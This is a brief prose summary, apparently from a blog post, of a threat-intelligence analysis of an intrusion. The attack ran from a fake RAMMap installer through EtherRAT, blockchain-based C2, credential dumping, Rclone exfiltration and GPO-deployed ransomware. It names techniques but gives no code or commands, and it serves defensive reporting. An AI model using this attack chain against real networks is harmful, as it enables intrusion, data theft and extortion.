This technical analysis details a multi-stage intrusion involving EtherRAT and the AI-generated TukTuk malware framework, culminating in a domain-wide deployment of The Gentleman ransomware. The attack began with a malicious MSI installer masquerading as a Sysinternals RAMMap utility, which deployed an EtherRAT variant using the Ethereum blockchain for dynamic C2 configuration. The threat actors utilized a sophisticated array of decentralized infrastructure, including EtherHiding and Arweave dead-drop resolvers, alongside legitimate SaaS platforms like ClickHouse and Supabase to maintain resilient communication channels.
Once persistence was established, the actors engaged in hands-on-keyboard activity, including Kerberoasting, LSASS dumping, and lateral movement via GoTo Resolve and NetExec. After exfiltrating sensitive data to Wasabi cloud storage using Rclone, the intrusion concluded with the execution of The Gentleman ransomware. The final payload was distributed across the network using a malicious Group Policy Object (GPO) and scheduled tasks, effectively bypassing traditional defenses through the abuse of legitimate administrative tools.
Top comments (0)